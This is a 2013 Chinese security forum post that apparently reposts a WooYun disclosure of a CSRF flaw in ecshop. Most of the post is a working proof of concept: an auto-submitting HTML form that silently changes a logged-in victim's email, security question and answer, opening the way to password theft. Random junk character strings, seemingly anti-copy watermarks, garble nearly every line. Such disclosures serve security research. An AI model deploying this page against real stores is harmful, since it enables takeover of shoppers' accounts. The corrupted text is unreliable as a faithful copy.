找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1816|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
简要描述:
* N" b) |: ^' Y* ?; ~ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现9 ~  L" c6 l9 L1 \2 T9 ]7 C

( t3 W% S) Z* dDemo For:http://www.wooyun.org/bug.php?action=view&id=395
' M, o0 b1 J8 v! `" i
# i) n; k1 K+ S* f7 \1 q详细说明:
" y/ n5 z- c5 P' i  |5 Q利用csrf和xss可以突破官方所说的“障碍”
  K4 J- o9 C& b" u, K* Uxss版本已经有人说明" o6 O! }. y! v: E( M) n
这里给出csrf版本3 @6 C5 G9 c: U; A. }2 E  ]& H

7 `2 m" o& b- w4 |' m. h漏洞证明:
0 `2 @! P- y8 Y7 e7 g/ \<html>' S6 p2 I1 e7 w5 V
<body>' v5 n8 c, ?7 g3 Y
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">9 Z& c" ^2 @6 h2 L! O
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">( v: d5 T0 M0 L  [- {7 y
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
4 a6 h) \! N, j" M' R9 P9 O0 t<INPUT TYPE="text" NAME="sel_question" value="ecshop">: b2 ~% i3 r, M, _: n
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
% Z/ }1 y/ v. q6 b</body>
/ J6 |4 V9 z3 E$ k<script>, K8 B2 T5 n  E! B$ L$ _8 g' \
document.forms[0].submit();
* q/ _+ W" }8 ]9 L</script>
! P( v; X5 \* d2 n& `! ]</html>
1 L  _! m# c' I. i7 X) D- C构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
: n' S# N1 Z0 Q0 h) Q# n+ I" T' J* F! H2 x$ d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表